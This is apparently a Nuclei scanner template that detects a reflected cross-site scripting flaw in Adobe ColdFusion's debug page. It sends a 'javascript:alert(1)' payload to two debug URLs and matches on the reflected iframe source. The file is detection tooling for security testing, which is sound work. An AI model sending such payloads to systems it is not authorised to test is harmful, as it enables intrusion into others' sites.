31 lines
719 B
YAML
31 lines
719 B
YAML
id: coldfusion-debug-xss
|
|
|
|
info:
|
|
name: Adobe ColdFusion Debug Page XSS
|
|
author: dhiyaneshDK
|
|
severity: medium
|
|
reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml
|
|
tags: adobe,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)'
|
|
- '{{BaseURL}}/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"cf_main_cf" src="javascript:alert(1)"'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|